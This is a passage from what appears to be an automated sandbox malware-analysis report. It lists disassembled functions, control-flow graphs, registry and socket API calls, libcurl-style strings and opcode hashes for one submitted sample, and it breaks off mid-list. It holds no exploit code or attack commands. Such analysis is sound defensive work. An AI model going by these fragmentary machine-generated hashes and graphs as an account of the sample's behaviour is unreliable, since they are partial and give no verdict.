                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                    • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                    • API String ID: 4281207131-1047472027
                                                    • Opcode ID: 9590d33fa915b16819249925057d616ed74ca0f1f6646577f0aaef397aafdb3d
                                                    • Instruction ID: 740ee3f04cb8f4ea869deef5d2786f6ad70533f2499b0baf47e00fd2eec88e85
                                                    • Opcode Fuzzy Hash: 9590d33fa915b16819249925057d616ed74ca0f1f6646577f0aaef397aafdb3d
                                                    • Instruction Fuzzy Hash: 5472CFB1604311AFE7249B24ED81B6B7BE8FF85700F144828F985EB291E775E984CB53
                                                    Function 007AA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 007AA831
                                                    Strings
                                                    • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 007AA6CE
                                                    • cf-socket.c, xrefs: 007AA5CD, 007AA735
                                                    • Local Interface %s is ip %s using address family %i, xrefs: 007AAE60
                                                    • @, xrefs: 007AAC42
                                                    • cf_socket_open() -> %d, fd=%d, xrefs: 007AA796
                                                    • Name '%s' family %i resolved to '%s' family %i, xrefs: 007AADAC
                                                    • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 007AAD0A
                                                    • @, xrefs: 007AA8F4
                                                    • bind failed with errno %d: %s, xrefs: 007AB080
                                                    • Couldn't bind to '%s' with errno %d: %s, xrefs: 007AAE1F
                                                    • Trying [%s]:%d..., xrefs: 007AA689
                                                    • Bind to local port %d failed, trying next, xrefs: 007AAFE5
                                                    • Local port: %hu, xrefs: 007AAF28
                                                    • Could not set TCP_NODELAY: %s, xrefs: 007AA871
                                                    • Trying %s:%d..., xrefs: 007AA7C2, 007AA7DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: setsockopt
                                                    • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                    • API String ID: 3981526788-2373386790
                                                    • Opcode ID: 982c21b5bb70b6987a89298b5c98612d18f158dcff7205a7abba383672a0c860
                                                    • Instruction ID: 0722eafe72ed00200e86b16392132619f9ca1e574956db714d68f5eca1c57438
                                                    • Opcode Fuzzy Hash: 982c21b5bb70b6987a89298b5c98612d18f158dcff7205a7abba383672a0c860
                                                    • Instruction Fuzzy Hash: 0362F471508341AFE7258F24C846BABB7E4AFD2314F044A19F98897292E779E845CB93
                                                    Function 00839740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 857 839740-83975b 858 839780-839782 857->858 859 83975d-839768 call 8378a0 857->859 861 839914-83994e call af8b70 RegOpenKeyExA 858->861 862 839788-8397a0 call af8e00 call 8378a0 858->862 866 8399bb-8399c0 859->866 867 83976e-839770 859->867 874 839950-839955 861->874 875 83995a-839992 RegQueryValueExA RegCloseKey call af8b98 861->875 862->866 871 8397a6-8397c5 862->871 872 839a0c-839a15 866->872 870 839772-83977e 867->870 867->871 870->862 881 839827-839833 871->881 882 8397c7-8397e0 871->882 874->872 885 839997-8399b5 call 8378a0 875->885 886 839835-83985c call 82e2b0 * 2 881->886 887 83985f-839872 call 835ca0 881->887 883 8397e2-8397f3 call af8b50 882->883 884 8397f6-839809 882->884 883->884 884->881 896 83980b-839810 884->896 885->866 885->871 886->887 897 8399f0 887->897 898 839878-83987d call 8377b0 887->898 896->881 901 839812-839822 896->901 900 8399f5-8399fb call 835d00 897->900 906 839882-839889 898->906 911 8399fe-839a09 900->911 901->872 906->900 910 83988f-83989b call 824fe0 906->910 910->897 916 8398a1-8398c3 call af8b50 call 8378a0 910->916 911->872 921 8399c2-8399ed call 82e2b0 * 2 916->921 922 8398c9-8398db call 82e2d0 916->922 921->897 922->921 926 8398e1-8398f0 call 82e2d0 922->926 926->921 932 8398f6-839905 call 8363f0 926->932 937 839f66-839f7f call 835d00 932->937 938 83990b-83990f 932->938 937->911 940 839a3f-839a5a call 836740 call 8363f0 938->940 940->937 946 839a60-839a6e call 836d60 940->946 949 839a70-839a94 call 836200 call 8367e0 call 836320 946->949 950 839a1f-839a39 call 836840 call 8363f0 946->950 961 839a16-839a19 949->961 962 839a96-839ac6 call 82d120 949->962 950->937 950->940 961->950 963 839fc1 961->963 967 839ae1-839af7 call 82d190 962->967 968 839ac8-839adb call 82d120 962->968 966 839fc5-839ffd call 835d00 call 82e2b0 * 2 963->966 966->911 967->950 975 839afd-839b09 call 824fe0 967->975 968->950 968->967 975->963 982 839b0f-839b29 call 82e730 975->982 987 839f84-839f88 982->987 988 839b2f-839b3a call 8378a0 982->988 989 839f95-839f99 987->989 988->987 994 839b40-839b54 call 82e760 988->994 991 839fa0-839fb6 call 82ebf0 * 2 989->991 992 839f9b-839f9e 989->992 1004 839fb7-839fbe 991->1004 992->963 992->991 1000 839f8a-839f92 994->1000 1001 839b5a-839b6e call 82e730 994->1001 1000->989 1007 839b70-83a004 1001->1007 1008 839b8c-839b97 call 8363f0 1001->1008 1004->963 1012 83a015-83a01d 1007->1012 1016 839c9a-839cab call 82ea00 1008->1016 1017 839b9d-839bbf call 836740 call 8363f0 1008->1017 1014 83a024-83a045 call 82ebf0 * 2 1012->1014 1015 83a01f-83a022 1012->1015 1014->966 1015->966 1015->1014 1025 839f31-839f35 1016->1025 1026 839cb1-839ccd call 82ea00 call 82e960 1016->1026 1017->1016 1034 839bc5-839bda call 836d60 1017->1034 1030 839f40-839f61 call 82ebf0 * 2 1025->1030 1031 839f37-839f3a 1025->1031 1045 839ccf 1026->1045 1046 839cfd-839d0e call 82e960 1026->1046 1030->950 1031->950 1031->1030 1034->1016 1044 839be0-839bf4 call 836200 call 8367e0 1034->1044 1044->1016 1065 839bfa-839c0b call 836320 1044->1065 1049 839cd1-839cec call 82e9f0 call 82e4a0 1045->1049 1054 839d53-839d55 1046->1054 1055 839d10 1046->1055 1066 839d47-839d51 1049->1066 1067 839cee-839cfb call 82e9d0 1049->1067 1058 839e69-839e8e call 82ea40 call 82e440 1054->1058 1059 839d12-839d2d call 82e9f0 call 82e4a0 1055->1059 1082 839e90-839e92 1058->1082 1083 839e94-839eaa call 82e3c0 1058->1083 1086 839d5a-839d6f call 82e960 1059->1086 1087 839d2f-839d3c call 82e9d0 1059->1087 1080 839c11-839c1c call 837b70 1065->1080 1081 839b75-839b86 call 82ea00 1065->1081 1071 839dca-839ddb call 82e960 1066->1071 1067->1046 1067->1049 1092 839e2e-839e36 1071->1092 1093 839ddd-839ddf 1071->1093 1080->1008 1097 839c22-839c33 call 82e960 1080->1097 1081->1008 1103 839f2d 1081->1103 1090 839eb3-839ec4 call 82e9c0 1082->1090 1113 839eb0-839eb1 1083->1113 1114 83a04a-83a04c 1083->1114 1109 839dc2 1086->1109 1110 839d71-839d73 1086->1110 1087->1059 1106 839d3e-839d42 1087->1106 1090->950 1122 839eca-839ed0 1090->1122 1099 839e38-839e3b 1092->1099 1100 839e3d-839e5b call 82ebf0 * 2 1092->1100 1102 839e06-839e21 call 82e9f0 call 82e4a0 1093->1102 1124 839c66-839c75 call 8378a0 1097->1124 1125 839c35 1097->1125 1099->1100 1111 839e5e-839e67 1099->1111 1100->1111 1140 839e23-839e2c call 82eac0 1102->1140 1141 839de1-839dee call 82ec80 1102->1141 1103->1025 1106->1058 1109->1071 1120 839d9a-839db5 call 82e9f0 call 82e4a0 1110->1120 1111->1058 1111->1090 1113->1090 1118 83a057-83a070 call 82ebf0 * 2 1114->1118 1119 83a04e-83a051 1114->1119 1118->1004 1119->963 1119->1118 1154 839db7-839dc0 call 82eac0 1120->1154 1155 839d75-839d82 call 82ec80 1120->1155 1123 839ee5-839ef2 call 82e9f0 1122->1123 1123->950 1146 839ef8-839f0e call 82e440 1123->1146 1151 83a011 1124->1151 1152 839c7b-839c8f call 82e7c0 1124->1152 1131 839c37-839c51 call 82e9f0 1125->1131 1131->1008 1170 839c57-839c64 call 82e9d0 1131->1170 1164 839df1-839e04 call 82e960 1140->1164 1141->1164 1168 839ed2-839edf call 82e9e0 1146->1168 1169 839f10-839f26 call 82e3c0 1146->1169 1151->1012 1152->1008 1165 839c95-83a00e 1152->1165 1174 839d85-839d98 call 82e960 1154->1174 1155->1174 1164->1092 1164->1102 1165->1151 1168->950 1168->1123 1169->1168 1184 839f28 1169->1184 1170->1124 1170->1131 1174->1109 1174->1120 1184->963
                                                    APIs
                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00839946
                                                    • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00839974
                                                    • RegCloseKey.KERNELBASE(?), ref: 0083998B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                    • API String ID: 3677997916-4129964100
                                                    • Opcode ID: 1f4ebdfc39f343db71c2bfff6cee26b01dea4de88bb881123df7e9048d8f2d46
                                                    • Instruction ID: 6bd294b4970a1c260cf864d82573934321d9df8aab4f8e000994fd096fe94877
                                                    • Opcode Fuzzy Hash: 1f4ebdfc39f343db71c2bfff6cee26b01dea4de88bb881123df7e9048d8f2d46
                                                    • Instruction Fuzzy Hash: 4B32A5B5904211ABEB11AB29EC42A1B7694FF94318F084438FD89D6263FB71ED64C7D3
                                                    Function 007A8B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1360 7a8b50-7a8b69 1361 7a8b6b-7a8b74 1360->1361 1362 7a8be6 1360->1362 1364 7a8beb-7a8bf2 1361->1364 1365 7a8b76-7a8b8d 1361->1365 1363 7a8be9 1362->1363 1363->1364 1366 7a8b8f-7a8ba7 call 786e40 1365->1366 1367 7a8bf3-7a8bfe call 7aa550 1365->1367 1374 7a8cd9-7a8d16 SleepEx 1366->1374 1375 7a8bad-7a8baf 1366->1375 1372 7a8de4-7a8def 1367->1372 1373 7a8c04-7a8c08 1367->1373 1378 7a8e8c-7a8e95 1372->1378 1379 7a8df5-7a8e19 call 7aa150 1372->1379 1376 7a8c0e-7a8c1d 1373->1376 1377 7a8dbd-7a8dc3 1373->1377 1390 7a8d18-7a8d20 1374->1390 1391 7a8d22 1374->1391 1380 7a8ca6-7a8cb0 1375->1380 1381 7a8bb5-7a8bb9 1375->1381 1384 7a8c1f-7a8c30 connect 1376->1384 1385 7a8c35-7a8c48 call 7aa150 1376->1385 1377->1363 1382 7a8f00-7a8f06 1378->1382 1383 7a8e97-7a8e9c 1378->1383 1419 7a8e1b-7a8e26 1379->1419 1420 7a8e88 1379->1420 1380->1374 1386 7a8cb2-7a8cb8 1380->1386 1381->1364 1388 7a8bbb-7a8bc2 1381->1388 1382->1364 1392 7a8e9e-7a8eb6 call 782a00 1383->1392 1393 7a8edf-7a8eef call 7778b0 1383->1393 1384->1385 1418 7a8c4d-7a8c4f 1385->1418 1394 7a8cbe-7a8cd4 call 7ab180 1386->1394 1395 7a8ddc-7a8dde 1386->1395 1388->1364 1397 7a8bc4-7a8bcc 1388->1397 1399 7a8d26-7a8d39 1390->1399 1391->1399 1392->1393 1417 7a8eb8-7a8edd call 783410 * 2 1392->1417 1415 7a8ef2-7a8efc 1393->1415 1394->1372 1395->1363 1395->1372 1403 7a8bce-7a8bd2 1397->1403 1404 7a8bd4-7a8bda 1397->1404 1407 7a8d3b-7a8d3d 1399->1407 1408 7a8d43-7a8d61 call 78d8c0 call 7aa150 1399->1408 1403->1364 1403->1404 1404->1364 1413 7a8bdc-7a8be1 1404->1413 1407->1395 1407->1408 1439 7a8d66-7a8d74 1408->1439 1414 7a8dac-7a8db8 call 7b50a0 1413->1414 1414->1364 1415->1382 1417->1415 1424 7a8c8e-7a8c93 1418->1424 1425 7a8c51-7a8c58 1418->1425 1426 7a8e28-7a8e2c 1419->1426 1427 7a8e2e-7a8e85 call 78d090 call 7b4fd0 1419->1427 1420->1378 1430 7a8dc8-7a8dd9 call 7ab100 1424->1430 1431 7a8c99-7a8c9f 1424->1431 1425->1424 1434 7a8c5a-7a8c62 1425->1434 1426->1420 1426->1427 1427->1420 1430->1395 1431->1380 1435 7a8c6a-7a8c70 1434->1435 1436 7a8c64-7a8c68 1434->1436 1435->1424 1440 7a8c72-7a8c8b call 7b50a0 1435->1440 1436->1424 1436->1435 1439->1364 1443 7a8d7a-7a8d81 1439->1443 1440->1424 1443->1364 1448 7a8d87-7a8d8f 1443->1448 1451 7a8d9b-7a8da1 1448->1451 1452 7a8d91-7a8d95 1448->1452 1451->1364 1453 7a8da7 1451->1453 1452->1364 1452->1451 1453->1414
                                                    APIs
                                                    • connect.WS2_32(?,?,00000001), ref: 007A8C30
                                                    • SleepEx.KERNELBASE(00000000,00000000), ref: 007A8CF3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: Sleepconnect
                                                    • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                    • API String ID: 238548546-879669977
                                                    • Opcode ID: 9f7a512265a544571ca0cb58ed6021654e9ba348740ca0c76c47578f5ce85517
                                                    • Instruction ID: 5adbd0832fd7fc02c011ee17543eb988986cf3c4a0d3ff828bbf8f4685a6350b
                                                    • Opcode Fuzzy Hash: 9f7a512265a544571ca0cb58ed6021654e9ba348740ca0c76c47578f5ce85517
                                                    • Instruction Fuzzy Hash: 0BB1C470604346EFDB50DF24C985BA7B7E0AF86314F048A2DE8594B2D2DB78EC54CB62
                                                    Function 00772F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1454 772f17-772f8c call bfeb30 call bfef20 1459 7731c9-7731cd 1454->1459 1460 7731d3-7731d6 1459->1460 1461 772f91-772ff4 call 771619 RegOpenKeyExA 1459->1461 1464 7731c5 1461->1464 1465 772ffa-77300b 1461->1465 1464->1459 1466 77315c-7731ac RegEnumKeyExA 1465->1466 1467 7731b2-7731c2 1466->1467 1468 773010-773083 call 771619 RegOpenKeyExA 1466->1468 1467->1464 1472 77314e-773152 1468->1472 1473 773089-7730d4 RegQueryValueExA 1468->1473 1472->1466 1474 7730d6-773137 call bfee00 call bfee90 call bfef20 call bfed30 call bfef20 call bfd2a0 1473->1474 1475 77313b-77314b RegCloseKey 1473->1475 1474->1475 1475->1472
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: EnumOpen
                                                    • String ID: d
                                                    • API String ID: 3231578192-2564639436
                                                    • Opcode ID: 564adb494cda964f46f1a3546854767de6ada85683d759fc323967af526f9d31
                                                    • Instruction ID: 009e31603bb3de9f66a2396801f4b9beffd29ad090b171c1f6f1358ecd3a03c5
                                                    • Opcode Fuzzy Hash: 564adb494cda964f46f1a3546854767de6ada85683d759fc323967af526f9d31
                                                    • Instruction Fuzzy Hash: 0D71B5B4904309DFDB10DF69D5847AEBBF1BF84308F1088ADE59897311E7749A888F92
                                                    Function 007776A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1488 7776a0-7776be 1489 7776e6-7776f2 send 1488->1489 1490 7776c0-7776c7 1488->1490 1491 7776f4-777709 call 7772a0 1489->1491 1492 77775e-777762 1489->1492 1490->1489 1493 7776c9-7776d1 1490->1493 1491->1492 1495 7776d3-7776e4 1493->1495 1496 77770b-777759 call 7772a0 call 77cb20 call af8c50 1493->1496 1495->1491 1496->1492
                                                    APIs
                                                    • send.WS2_32(multi.c,?,?,?,N=w,00000000,?,?,007807BF), ref: 007776EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: send
                                                    • String ID: LIMIT %s:%d %s reached memlimit$N=w$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                    • API String ID: 2809346765-95302684
                                                    • Opcode ID: 118840f80f748329601b5da9f1d842a6b85cf642049addfe42effe739868af6f
                                                    • Instruction ID: 53058c7c52b46e2de56e89652c10f4c16352ee32155b584042e49ede2864a426
                                                    • Opcode Fuzzy Hash: 118840f80f748329601b5da9f1d842a6b85cf642049addfe42effe739868af6f
                                                    • Instruction Fuzzy Hash: 6311E7B5A083456FD9149B16AC4AE2B3B5CDBC2BA8F45494AF90C632D1D5769C04C2B2
                                                    Function 007A9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1607 7a9290-7a92ed call 7776a0 1610 7a93c3-7a93ce 1607->1610 1611 7a92f3-7a92fb 1607->1611 1620 7a93d0-7a93e1 1610->1620 1621 7a93e5-7a9427 call 78d090 call 7b4f40 1610->1621 1612 7a93aa-7a93af 1611->1612 1613 7a9301-7a9333 call 78d8c0 call 78d9a0 1611->1613 1614 7a9456-7a9470 1612->1614 1615 7a93b5-7a93bc 1612->1615 1632 7a93a7 1613->1632 1633 7a9335-7a9364 WSAIoctl 1613->1633 1618 7a9429-7a9431 1615->1618 1619 7a93be 1615->1619 1623 7a9439-7a943f 1618->1623 1624 7a9433-7a9437 1618->1624 1619->1614 1620->1615 1625 7a93e3 1620->1625 1621->1614 1621->1618 1623->1614 1628 7a9441-7a9453 call 7b50a0 1623->1628 1624->1614 1624->1623 1625->1614 1628->1614 1632->1612 1637 7a939b-7a93a4 1633->1637 1638 7a9366-7a936f 1633->1638 1637->1632 1638->1637 1639 7a9371-7a9390 setsockopt 1638->1639 1639->1637 1640 7a9392-7a9395 1639->1640 1640->1637
                                                    APIs
                                                    • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 007A935D
                                                    • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 007A9388
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
